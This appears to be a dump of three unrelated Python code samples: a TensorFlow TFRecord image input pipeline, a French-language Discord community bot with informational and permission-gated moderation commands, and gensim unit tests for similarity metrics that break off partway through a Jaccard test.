    # Feature spec shared by train and test records (TF1 FixedLenFeature API).
    keys_to_features = {
        'image': tf.FixedLenFeature((), tf.string),
        'well': tf.FixedLenFeature((), tf.string),
        'well_type': tf.FixedLenFeature((), tf.string),
        'plate': tf.FixedLenFeature((), tf.int64),
        'site': tf.FixedLenFeature((), tf.int64),
        'cell_type': tf.FixedLenFeature((), tf.string),
        'experiment': tf.FixedLenFeature((), tf.string)
    }
    if not test:
        # The ground-truth label only exists in training records.
        keys_to_features['sirna'] = tf.FixedLenFeature((), tf.int64)
    res = tf.parse_single_example(value, keys_to_features)
    if test:
        res['sirna'] = DUMMY_SIRNA
    return res
def data_to_image(value, use_bfloat16=True, pixel_stats=None, dim=512):
    """Decode a parsed record into an (image, label) pair.

    value: dict from parse(); 'image' holds raw uint8 bytes of a
        512x512x6 image.
    use_bfloat16: cast the final image to bfloat16 (TPU-friendly).
    pixel_stats: optional (mean, std) pair used to normalise the pixels.
    dim: target spatial size; resizing happens only when dim != 512.
    """
    image_raw = tf.decode_raw(value['image'], tf.uint8)
    # The stored payload is always 512x512 with 6 channels.
    raw_shape = [512, 512, 6]
    image_shape = [dim, dim, 6]
    image = tf.reshape(image_raw, raw_shape)
    if dim != 512:
        # NOTE(review): tf.image.resize returns a float tensor even for
        # uint8 input, so this branch changes dtype relative to the
        # dim == 512 path -- confirm downstream code tolerates both.
        image = tf.image.resize(image, [dim, dim])
    image.set_shape(image_shape)
    if pixel_stats is not None:
        mean, std = pixel_stats
        image = (tf.cast(image, tf.float32) - mean) / std
    if use_bfloat16:
        image = tf.image.convert_image_dtype(image, dtype=tf.bfloat16)
    label = value["sirna"]
    return image, label
DEFAULT_PARAMS = dict(batch_size=512)
def input_fn(tf_records_glob,
             input_fn_params,
             params=None,
             use_bfloat16=False,
             pixel_stats = None,
             transpose_input=True,
             shuffle_buffer=64,
             test=False,
             dim=512):
    """Build the tf.data.Dataset input pipeline for the TFRecords.

    tf_records_glob: glob pattern of the TFRecord files to read.
    input_fn_params: dict of pipeline tuning knobs (buffer sizes,
        parallelism degrees) looked up by name below.
    params: dict carrying 'batch_size' (TPUEstimator convention).
    test: when True, keep deterministic order and do not shuffle/repeat.
    NOTE(review): shuffle_buffer is accepted but never used; the shuffle
    below hard-codes 2048.
    """
    batch_size = params['batch_size']
    # Deterministic file order for test; shuffled file order for training.
    filenames_dataset = tf.data.Dataset.list_files(tf_records_glob, shuffle=not test)
    def fetch_images(filenames):
        # Read GZIP-compressed TFRecords with a large read buffer.
        dataset = tf.data.TFRecordDataset(
            filenames,
            compression_type="GZIP",
            buffer_size=(1000 * 1000 *
                         input_fn_params['tfrecord_dataset_buffer_size']),
            num_parallel_reads=input_fn_params[
                'tfrecord_dataset_num_parallel_reads'])
        return dataset
    # Interleave reads across files; sloppy (non-deterministic) ordering is
    # only allowed outside of test mode.
    images_dataset = filenames_dataset.apply(
        tf.contrib.data.parallel_interleave(
            fetch_images,
            cycle_length=input_fn_params['parallel_interleave_cycle_length'],
            block_length=input_fn_params['parallel_interleave_block_length'],
            sloppy=not test,
            buffer_output_elements=input_fn_params[
                'parallel_interleave_buffer_output_elements'],
            prefetch_input_elements=input_fn_params[
                'parallel_interleave_prefetch_input_elements']))
    if not test:
        images_dataset = images_dataset.shuffle(2048).repeat()
    # Get image and label now
    dataset = images_dataset.apply(
        tf.contrib.data.map_and_batch(
            lambda value: data_to_image(parse(value, test), use_bfloat16=use_bfloat16, pixel_stats=pixel_stats, dim=dim),
            batch_size=batch_size,
            num_parallel_calls=input_fn_params['map_and_batch_num_parallel_calls'],
            drop_remainder=True))
    # Transpose for performance on TPU
    if transpose_input:
        dataset = dataset.map(
            lambda images, labels: (tf.transpose(images, [1, 2, 3, 0]), labels),
            num_parallel_calls=input_fn_params['transpose_num_parallel_calls'])
    # Assign static batch size dimension
    dataset = dataset.map(partial(set_shapes, transpose_input, batch_size))
    # Prefetch overlaps in-feed with training
    dataset = dataset.prefetch(
        buffer_size=input_fn_params['prefetch_buffer_size'])
    return dataset
| StarcoderdataPython |
151965 | import discord
import json
from discord.ext import commands
from discord.utils import get
# Bot instance: '*' command prefix, built-in help disabled (a custom *help
# command is defined below).
sigma = commands.Bot(command_prefix='*', help_command=None)
# Per-user warning store (apparently unused in this file).
warnings = {}
# Placeholder -- replace with the real bot token before running.
token = "TOKEN_BOT"
# Set the bot's presence/status message once it has connected.
@sigma.event
async def on_ready():
    print("Sigma est prêt !")
    await sigma.change_presence(status=discord.Status.online,
                                activity=discord.Game("*help | Créer par miaoumania#1017 et ₴Ⱨ₳ĐØ₩ĐɆV#7683"))
# Show general information about the bot itself.
@sigma.command(aliases=['bot'])
async def botinfos(ctx):
    # BUG FIX: the original embed used "/n" (a typo for the escape "\n") and
    # had no line break after the section headers, so the text ran together.
    embed = discord.Embed(title="Information sur le bot !",
                          description="**Infos principales :**\n"
                                      "Le bot Sigma est entièrement codé en Python, avec le module `discord.py` et le module `json` \n"
                                      "Le script du bot à principalement été codé par <@490834874022756363> et le reste par <@761298593406910465>. \n"
                                      "Le bot est host sur un serveur de 200MB de RAM et de 1GB de stockage ! \n"
                                      "\n"
                                      "**Infos supplémentaires :**\n"
                                      "Nombre de lignes dans le script : `409` \n"
                                      "Version de Python : `3.8` \n"
                                      "Version du serveur host : `Pterodactyl Deamon`",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Show the server rules (delegates to Discord's ToS and Guidelines).
@sigma.command(aliases=['regle'])
async def regles(ctx):
    embed = discord.Embed(title="Règles du serveur :",
                          description="Le règlement du serveur se résume aux [ToS](https://discord.com/terms) et ["
                                      "Guidelines](https://discord.com/guidelines) de Discord. \n \n Tout membre du "
                                      "staff se réserve le droit d'appliquer la sanction lui semblant appropriée à un "
                                      "membre ne respectant pas l'un des points mentionnés dans les conditions et la "
                                      "charte d'utilisation de Discord et des lois francophones.",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    # Remove the invoking message to keep the channel tidy.
    await ctx.message.delete()
# List the members of the server staff.
@sigma.command()
async def staff(ctx):
    # BUG FIX: the original contained "/n/n", a typo for "\n\n", which was
    # rendered literally in the embed.
    embed = discord.Embed(title="Les membres du staff :",
                          description="`@👑・Fondateurs` : <@490834874022756363> \n\n`👑・Administrateurs` : <@761298593406910465> <@630819991117234176> \n\n`⚡・Super Modérateurs` : <@699214343178551296> \n\n`🌌・Modérateurs` : <@768897650049155112> \n\n"
                                      "\n\n"
                                      "Total : `5` membres du staff SIGMΛ \n\n",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Show the server's logo (hard-coded CDN attachment URL).
@sigma.command(aliases=['serveuravatar'])
async def serveravatar(ctx):
    embed = discord.Embed(color=0x2F3136)
    embed.set_image(
        url="https://cdn.discordapp.com/attachments/788793873106206758/789550458493992960/83458149cc4ab1baee5d5d3b0d25576f.png")
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Show the avatar of the mentioned member (or of the caller).
@sigma.command()
async def avatar(ctx, *, avamember: discord.Member = None):
    # BUG FIX: with no member given, avamember is None and the original
    # crashed with AttributeError; default to the command author instead.
    if avamember is None:
        avamember = ctx.author
    userAvatarUrl = avamember.avatar_url
    await ctx.send(userAvatarUrl)
# Show the server presentation text.
@sigma.command(aliases=['info'])
async def infos(ctx):
    embed = discord.Embed(title="Présentation de Sιgmα",
                          description="SIGMΛ (aka. SIGMA, Sigma, Sιgmα, Σ) est un serveur Discord communautaire avec "
                                      "comme but principal la discussion et le partage. Il a ouvert ses portes le 19 "
                                      "décembre 2020, fondé par <@490834874022756363>.\n Un bot a été codé "
                                      "spécialement pour le serveur ! \n Des animations, évenements, tournois, "
                                      "concours... ont lieu régulièrement ! Des giveaways de jeux EpicGames sont "
                                      "disponibles à tous les paliers de membres importants !",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Explain the server's level/rank system (0 to 100).
@sigma.command(aliases=['niveau'])
async def niveaux(ctx):
    embed = discord.Embed(title="Les niveaux du serveur :",
                          description="Les niveaux du serveur vont de 0 à 100, avec un rôle pour chaque niveau. \n\nDu Niveau 1 au Niveau 100 , en passant par le Niveau 10 , le Niveau 50, ou encore le Niveau 78. \n\n Le classement des membres du serveur et la liste de tous les rôles disponibles peut être trouvée [ici](https://arcanebot.xyz/lb/sigma).",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Make the bot repeat a message in the given channel (staff only).
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def say(ctx, channel: discord.TextChannel, *, message):
    await channel.send(message)
# Error handler for *say: runs when the command above fails.
@say.error
async def say_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Custom *help command (the built-in one is disabled on the Bot instance).
@sigma.command(aliases=['aide'])
async def help(ctx):
    embed = discord.Embed(title="Les différentes commandes du bot sigma :",
                          description="`*infos` affiche la présentation du serveur. \n`*regles` affiche les règles du serveur.\n`*salons` affiche les différents salons du serveur. \n`*staff` affiche les membres du staff de Sigma. \n `*bot` affiche les infos du bot \n`*candidature` affiche le formulaire pour soumettre sa candidature d'entrée dans le staff. \n`*suggestion` affiche les consignes pour soumettre une suggestion. \n`*reportinfos` affiche les consignes pour soumettre un report. \n`*serveravatar` affiche le logo du serveur. \n`*avatar @nomdel'utilisateur` affiche l'avatar de l'utilisateur mentionné. \n`*niveaux` affiche les différents niveaux disponibles sur le serveur.\n`*ping` affiche le ping du bot.\n`*pipo` affiche le fameux gif du pipo. \n`*serverinfo` affiche les informations du serveur.\n`*suggest [votre suggestion]` envoie la suggestion proposée.\n`*report [votre report] permez de report, de signaler un bug, etc.`\n`*help` affiche cette page. ",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Explain how to submit a suggestion (see the *suggest command).
@sigma.command(aliases=['suggestions'])
async def suggestion(ctx):
    embed = discord.Embed(title="Comment suggérer une modification ou un ajout ? ",
                          description="Pour cela, rendez-vous dans le <#788817193709469746> (en traveaux) et tapez la commande ***suggest** suivie de votre suggestion.",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Explain how to report a user or a bug (see the report command).
@sigma.command(aliases=['reportinfo'])
async def reportinfos(ctx):
    # BUG FIX: "/n" in the original was a typo for "\n" and was rendered
    # literally in the embed.
    embed = discord.Embed(title="Comment report quelqu'un ou un bug ?",
                          description="Si vous voulez report quelqu'un, merci de nous indiquer son pseudo **sans** le mentionner ou nous donner son **ID** avec le plus de détails possibles. \n"
                                      "\n"
                                      "Si vous voulez report un bug, merci de nous indiquer dans quel salon cela est arrivé, et de nous donner les details du bug pour permettre à notre staff de le régler le plus vite possible.",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Explain how to apply for a staff position (Google Forms link).
@sigma.command(aliases=['candid', 'candidatures'])
async def candidature(ctx):
    embed = discord.Embed(title="Comment soumettre sa candidature pour entrer dans le staff ? ",
                          description="Pour cela, rendez-vous sur [cette page](https://docs.google.com/forms/d/e/1FAIpQLSdiYRTJVfQ6fIZdj7IY6PjBlZRsYbN-o7tQY2o-bhOpfDwG4w/viewform?usp=pp_url), et répondez aux questions. Un administrateur vous recontactera pour vous donner les résultats.",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Describe what each channel of the server is for.
@sigma.command(aliases=['salon', 'channel', 'channels'])
async def salons(ctx):
    embed = discord.Embed(title="Les salons du serveur :",
                          description="<#788782269018931202> ・ La présentation du serveur ヾ(•ω•)o \n<#788780806230900766> ・ Règlement du serveur ψ(.-. )> \n`━━━━━📜━━━━━` \n<#788784016001859585> ・ Salon qui contient les annonces du serveur ( ̄3 ̄)╭ \n <#788800922842955857> ・ Salon des arrivées, départs, warns, invitations... (*^_^*) \n<#788764210443059200> ・ Salon textuel pour bavarder (*^▽^*) \n<#788801331040616449> ・ Pour partagez des images, vidéos, gifs ou memes q(≧▽≦q)\n<#788783889828675655> ・ Salon réservé aux commandes des bots ! ╰(*°▽°*)╯\n<#788817193709469746> ・ Salon utilisé pour suggérer une modification ou un ajout ( •̀ ω •́ )✧\n`━━━━━🎉━━━━━`\n<#789055875268083783> ・ Le salon des cadeaux !!! (^∇^)\n<#788820483553755197> ・ Dans ce salon, un fait intéressant ou insolite est publié chaque jour o(* ̄▽ ̄*)o\n<#788817474350743562> ・ Chaque membre peut publier un mot ou expression afin de compléter la phrase infinie (◠‿◠)\n (***TOUTS LES SALON SONT EN TRAVEAUX !***)",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Ban a user, with an optional free-form reason.
@sigma.command()
@commands.has_permissions(ban_members=True)
async def ban(ctx, user: discord.User, *reason):
    # *reason captures the remaining words; join them back into a sentence.
    reason = " ".join(reason)
    await ctx.guild.ban(user, reason=reason)
    await ctx.send(f"{user} à été ban pour la raison suivante : {reason}.")
# Error handler for *ban (missing permissions).
@ban.error
async def ban_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Bannissement de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Unban a user given as "Name#1234" (name + discriminator).
@sigma.command()
@commands.has_permissions(ban_members=True)
async def unban(ctx, user, *reason):
    reason = " ".join(reason)
    # NOTE(review): raises ValueError if the argument contains no '#'
    # (or more than one) -- no explicit handling here.
    userName, userId = user.split("#")
    bannedUsers = await ctx.guild.bans()
    # Scan the ban list for a matching name + discriminator.
    for i in bannedUsers:
        if i.user.name == userName and i.user.discriminator == userId:
            await ctx.guild.unban(i.user, reason=reason)
            await ctx.send(f"{user} à été unban.")
            return
    await ctx.send(f"L'utilisateur {user} n'est pas dans la liste des bans")
# Error handler for *unban (missing permissions).
@unban.error
async def unban_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Débannissement de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Kick a user from the server, with an optional free-form reason.
@sigma.command()
@commands.has_permissions(kick_members=True)
async def kick(ctx, user: discord.User, *reason):
    reason = " ".join(reason)
    await ctx.guild.kick(user, reason=reason)
    await ctx.send(f"{user} à été kick pour la raison suivante: {reason}")
    await ctx.message.delete()
# Error handler for *kick (missing permissions).
@kick.error
async def kick_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Exclusion de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Bulk-delete the last N messages of the channel.
@sigma.command(pass_context=True, aliases=['purge', 'clean', 'delete'])
@commands.has_permissions(manage_messages=True)
async def clear(ctx, limit: int):
    # +1 so that the invoking *clear message itself is removed too.
    await ctx.channel.purge(limit=limit + 1)
# Error handler for *clear (missing permissions).
@clear.error
async def clear_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Nettoyage des messages impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Create a "Muted" role that denies send/speak in every channel.
# NOTE(review): this is registered as a user-invocable command
# (@sigma.command) yet it is also awaited directly from getMutedRole below;
# calling a Command object directly bypasses the permission check -- confirm
# the decorators are intentional.
@sigma.command()
@commands.has_permissions(manage_roles=True)
async def createMutedRole(ctx):
    mutedRole = await ctx.guild.create_role(name="Muted",
                                            permissions=discord.Permissions(send_messages=False, speak=False),
                                            reason="Creation du role Muted pour mute des gens.")
    # Explicitly deny send/speak in every existing channel as well.
    for channel in ctx.guild.channels:
        await channel.set_permissions(mutedRole, send_messages=False, speak=False)
    return mutedRole
async def getMutedRole(ctx):
    """Return the guild's "Muted" role, creating it on first use."""
    for candidate in ctx.guild.roles:
        if candidate.name == "Muted":
            return candidate
    # No existing role found: create one with send/speak disabled.
    return await createMutedRole(ctx)
# Mute a member by assigning the "Muted" role.
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def mute(ctx, member: discord.Member, *, reason="Aucune raison n'a été renseignée"):
    mutedRole = await getMutedRole(ctx)
    member.add_roles(mutedRole, reason=reason) if False else await member.add_roles(mutedRole, reason=reason)
    await ctx.send(f"{member.mention} a été mute !")
    await ctx.message.delete()
# Error handler for *mute (missing permissions).
@mute.error
async def mute_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Mute de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Unmute a member by removing the "Muted" role.
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def unmute(ctx, member: discord.Member, *, reason="Aucune raison n'a été renseignée"):
    mutedRole = await getMutedRole(ctx)
    await member.remove_roles(mutedRole, reason=reason)
    await ctx.send(f"{member.mention} a été unmute !")
    await ctx.message.delete()
# Error handler for *unmute (missing permissions).
@unmute.error
async def unmute_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Unmute de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# List the moderation commands (staff-only help page).
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def modo(ctx):
    embed = discord.Embed(title="Les différentes commandes de modération du bot sigma :",
                          description="`*ban @utilisateur raison` Banni l'utilisateur mentionné. \n`*unban utilisateur#XXXX` Dé-banni l'utilisateur tagué.\n`*clear X` Supprime X messages. \n`*kick @utilisateur raison` Exclu l'utilisateur mentionné. \n`*mute @utilisateur raison` Rend muet l'utilisateur mentionné. \n`*unmute @utilisateur raison` Rend la parole à l'utilisateur mentionné. \n `*say #salon message` Envoie le message demandé dans le salon demandé.\n`*modo` affiche cette page.\n`*mp @utilisateur message` Envoie le message demandé à l'utilisateur mentionné. \n`*vote` permet de faire voter les membres. \n`.annonce` Envoi d'une annonce dans le channel __*<En cours>*__ \n***Aministrateurs seulement.***",
                          color=0x2F3136)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Error handler for *modo (missing permissions).
@modo.error
async def modo_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Send a direct message to the given user (admins only).
@sigma.command(aliases=['dm'])
@commands.has_permissions(administrator=True)
async def mp(ctx, user: discord.User, *, value):
    await user.send(f"{value}")
# Error handler for *mp (missing permissions).
@mp.error
async def mp_error(ctx, error):
    if isinstance(error, commands.MissingPermissions):
        await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
        await ctx.message.delete()
# Report the bot's websocket latency.
@sigma.command()
async def ping(ctx):
    # BUG FIX: Client.latency is expressed in seconds, so the original
    # round(latency, 1) almost always displayed 0.0 -- convert to ms.
    await ctx.send('Pong! {0}ms'.format(round(sigma.latency * 1000)))
    await ctx.message.delete()
# Post the "pipo" meme gif (hard-coded CDN attachment URL).
@sigma.command()
async def pipo(ctx):
    await ctx.send("https://cdn.discordapp.com/attachments/788764210443059200/790987611442905130/inconnu.gif")
    await ctx.message.delete()
# Show an embed with basic guild information.
@sigma.command()
async def serverinfo(ctx):
    name = str(ctx.guild.name)
    # NOTE(review): str() on a literal is redundant; also `name` is unused
    # because the title below is hard-coded to "SIGMΛ".
    description = str("SIGMΛ est un serveur Discord communautaire avec comme but principal la discussion et le partage.")
    id = str(ctx.guild.id)
    memberCount = str(ctx.guild.member_count)
    icon = str(ctx.guild.icon_url)
    embed = discord.Embed(
        title="SIGMΛ",
        description=description,
        color=0x2F3136
    )
    embed.set_thumbnail(url=icon)
    embed.add_field(name="Fondateur", value="<@490834874022756363>", inline=True)
    embed.add_field(name="ID", value=id, inline=True)
    # Region is hard-coded rather than read from the guild.
    embed.add_field(name="Région", value="Europe", inline=True)
    embed.add_field(name="Nombre de membres", value=memberCount, inline=True)
    await ctx.send(embed=embed)
    await ctx.message.delete()
# Post a member suggestion to the suggestion channel with vote reactions.
@sigma.command()
async def suggest(ctx, *, description):
    'Suggest a change: posts the description to the suggestion channel.'
    embed = discord.Embed(title='Nouvelle suggestion', description=f'Suggéré par: {ctx.author.mention}', color=discord.Color.blurple())
    embed.add_field(name='Description', value=description)
    # Hard-coded target channel ID.
    channel = ctx.guild.get_channel(845124536893440030)
    msg = await channel.send(embed=embed)
    await msg.add_reaction('👍')
    await msg.add_reaction('👎')
    await ctx.message.delete()
# Start a vote in the configured channel (admins only).
# NOTE(review): make sure no other command is registered under the name
# 'vote' -- discord.py raises CommandRegistrationError on duplicates.
@sigma.command()
@commands.has_permissions(administrator=True)
async def vote(ctx, *, description):
    'Start a vote: posts the description with yes/no reactions.'
    embed = discord.Embed(title='C\'est l\'heure de voter !', description=f'Vote par: {ctx.author.mention}', color=discord.Color.green())
    embed.add_field(name='Description', value=description)
    # Hard-coded target channel ID.
    channel = ctx.guild.get_channel(845124536893440030)
    msg = await channel.send(embed=embed)
    await msg.add_reaction('✔')
    await msg.add_reaction('❌')
    await ctx.message.delete()
# Report a user or a bug: posts the description to the report channel.
@sigma.command()
async def report(ctx, *, description):
    'Commande report'
    # BUG FIX: this command was also defined under the name `vote`, colliding
    # with the vote command above (discord.py rejects duplicate command
    # names). Its docstring and the *help text both advertise `*report`.
    embed = discord.Embed(title='Nouveau report !', description=f'Report éfféctué par: {ctx.author.mention}', color=discord.Color.red())
    embed.add_field(name='Description', value=description)
    # Hard-coded target channel ID.
    channel = ctx.guild.get_channel(845124536893440030)
    msg = await channel.send(embed=embed)
    await msg.add_reaction('✔')
    await msg.add_reaction('❌')
    await ctx.message.delete()
# Post an announcement to the configured channel (admins only).
@sigma.command()
@commands.has_permissions(administrator=True)
async def annonce(ctx, *, description):
    'Commande annonce'
    embed = discord.Embed(title='Annonce !', description=f'Annonce éfféctuée par: {ctx.author.mention}', color=discord.Color.blurple())
    embed.add_field(name='Description', value=description)
    # Hard-coded target channel ID.
    channel = ctx.guild.get_channel(845124536893440030)
    msg = await channel.send(embed=embed)
    await msg.add_reaction('✔')
    # NOTE(review): the @everyone ping is sent in the *invoking* channel,
    # not in the announcement channel -- confirm this is intended. The
    # f-string has no placeholders.
    await ctx.send(f"@everyone")
    await ctx.message.delete()
sigma.run(token)
| StarcoderdataPython |
94059 | <reponame>arnoyu-hub/COMP0016miemie<filename>venv/Lib/site-packages/gensim/test/test_similarity_metrics.py
#!/usr/bin/env python
# encoding: utf-8
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated test to check similarity functions and isbow function.
"""
import logging
import unittest
from gensim import matutils
from scipy.sparse import csr_matrix
import numpy as np
import math
from gensim.corpora.mmcorpus import MmCorpus
from gensim.models import ldamodel
from gensim.test.utils import datapath, common_dictionary, common_corpus
class TestIsBow(unittest.TestCase):
    """Tests for matutils.isbow (bag-of-words format detection)."""
    def test_None(self):
        # test None
        result = matutils.isbow(None)
        expected = False
        self.assertEqual(expected, result)
    def test_bow(self):
        # test list words
        # one bag of words
        potentialbow = [(0, 0.4)]
        result = matutils.isbow(potentialbow)
        expected = True
        self.assertEqual(expected, result)
        # multiple bags
        potentialbow = [(0, 4.), (1, 2.), (2, 5.), (3, 8.)]
        result = matutils.isbow(potentialbow)
        expected = True
        self.assertEqual(expected, result)
        # checking empty input
        potentialbow = []
        result = matutils.isbow(potentialbow)
        expected = True
        self.assertEqual(expected, result)
        # checking corpus; should return false
        potentialbow = [[(2, 1), (3, 1), (4, 1), (5, 1), (1, 1), (7, 1)]]
        result = matutils.isbow(potentialbow)
        expected = False
        self.assertEqual(expected, result)
        # not a bag of words, should return false
        potentialbow = [(1, 3, 6)]
        result = matutils.isbow(potentialbow)
        expected = False
        self.assertEqual(expected, result)
        # checking sparse matrix format bag of words
        potentialbow = csr_matrix([[1, 0.4], [0, 0.3], [2, 0.1]])
        result = matutils.isbow(potentialbow)
        expected = True
        self.assertEqual(expected, result)
        # checking np array format bag of words
        potentialbow = np.array([[1, 0.4], [0, 0.2], [2, 0.2]])
        result = matutils.isbow(potentialbow)
        expected = True
        self.assertEqual(expected, result)
class TestHellinger(unittest.TestCase):
    """Tests for matutils.hellinger over bow/ndarray/sparse inputs and
    LDA topic distributions."""
    def setUp(self):
        self.corpus = MmCorpus(datapath('testcorpus.mm'))
        self.class_ = ldamodel.LdaModel
        self.model = self.class_(common_corpus, id2word=common_dictionary, num_topics=2, passes=100)
    def test_inputs(self):
        # checking empty inputs
        vec_1 = []
        vec_2 = []
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
        # checking np array and list input
        vec_1 = np.array([])
        vec_2 = []
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
        # checking scipy csr matrix and list input
        vec_1 = csr_matrix([])
        vec_2 = []
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
    def test_distributions(self):
        # checking different length bag of words as inputs
        vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
        vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.484060507634
        self.assertAlmostEqual(expected, result)
        # checking symmetrical bag of words inputs return same distance
        vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
        vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1), (8, 0.1), (10, 0.8), (9, 0.1)]
        result = matutils.hellinger(vec_1, vec_2)
        result_symmetric = matutils.hellinger(vec_2, vec_1)
        expected = 0.856921568786
        self.assertAlmostEqual(expected, result)
        self.assertAlmostEqual(expected, result_symmetric)
        # checking ndarray, csr_matrix as inputs
        vec_1 = np.array([[1, 0.3], [0, 0.4], [2, 0.3]])
        vec_2 = csr_matrix([[1, 0.4], [0, 0.2], [2, 0.2]])
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.160618030536
        self.assertAlmostEqual(expected, result)
        # checking ndarray, list as inputs
        vec_1 = np.array([0.6, 0.1, 0.1, 0.2])
        vec_2 = [0.2, 0.2, 0.1, 0.5]
        result = matutils.hellinger(vec_1, vec_2)
        expected = 0.309742984153
        self.assertAlmostEqual(expected, result)
        # testing LDA distribution vectors
        # Seed fixed so the trained topic distributions are reproducible.
        np.random.seed(0)
        model = self.class_(self.corpus, id2word=common_dictionary, num_topics=2, passes=100)
        lda_vec1 = model[[(1, 2), (2, 3)]]
        lda_vec2 = model[[(2, 2), (1, 3)]]
        result = matutils.hellinger(lda_vec1, lda_vec2)
        expected = 1.0406845281146034e-06
        self.assertAlmostEqual(expected, result)
class TestKL(unittest.TestCase):
    """Tests for matutils.kullback_leibler, including its asymmetry and
    behaviour on LDA topic distributions."""
    def setUp(self):
        self.corpus = MmCorpus(datapath('testcorpus.mm'))
        self.class_ = ldamodel.LdaModel
        self.model = self.class_(common_corpus, id2word=common_dictionary, num_topics=2, passes=100)
    def test_inputs(self):
        # checking empty inputs
        vec_1 = []
        vec_2 = []
        result = matutils.kullback_leibler(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
        # checking np array and list input
        vec_1 = np.array([])
        vec_2 = []
        result = matutils.kullback_leibler(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
        # checking scipy csr matrix and list input
        vec_1 = csr_matrix([])
        vec_2 = []
        result = matutils.kullback_leibler(vec_1, vec_2)
        expected = 0.0
        self.assertEqual(expected, result)
    def test_distributions(self):
        # checking bag of words as inputs
        vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
        vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
        result = matutils.kullback_leibler(vec_2, vec_1, 8)
        expected = 0.55451775
        self.assertAlmostEqual(expected, result, places=5)
        # KL is not symetric; vec1 compared with vec2 will contain log of zeros and return infinity
        vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
        vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
        result = matutils.kullback_leibler(vec_1, vec_2, 8)
        self.assertTrue(math.isinf(result))
        # checking ndarray, csr_matrix as inputs
        vec_1 = np.array([[1, 0.3], [0, 0.4], [2, 0.3]])
        vec_2 = csr_matrix([[1, 0.4], [0, 0.2], [2, 0.2]])
        result = matutils.kullback_leibler(vec_1, vec_2, 3)
        expected = 0.0894502
        self.assertAlmostEqual(expected, result, places=5)
        # checking ndarray, list as inputs
        vec_1 = np.array([0.6, 0.1, 0.1, 0.2])
        vec_2 = [0.2, 0.2, 0.1, 0.5]
        result = matutils.kullback_leibler(vec_1, vec_2)
        expected = 0.40659450877
        self.assertAlmostEqual(expected, result, places=5)
        # testing LDA distribution vectors
        # Seed fixed so the trained topic distributions are reproducible.
        np.random.seed(0)
        model = self.class_(self.corpus, id2word=common_dictionary, num_topics=2, passes=100)
        lda_vec1 = model[[(1, 2), (2, 3)]]
        lda_vec2 = model[[(2, 2), (1, 3)]]
        result = matutils.kullback_leibler(lda_vec1, lda_vec2)
        expected = 4.283407e-12
        self.assertAlmostEqual(expected, result, places=5)
class TestJaccard(unittest.TestCase):
    """Tests for matutils.jaccard across the supported input formats."""

    def test_inputs(self):
        # Two empty vectors have an empty union, which triggers a
        # division by zero inside the jaccard computation.
        self.assertRaises(ZeroDivisionError, matutils.jaccard, [], [])

    def test_distributions(self):
        # Bag-of-words inputs.
        bow_a = [(2, 1), (3, 4), (4, 1), (5, 1), (1, 1), (7, 2)]
        bow_b = [(1, 1), (3, 8), (4, 1)]
        self.assertAlmostEqual(1 - 0.3, matutils.jaccard(bow_b, bow_a))

        # ndarray vs. scipy CSR matrix.
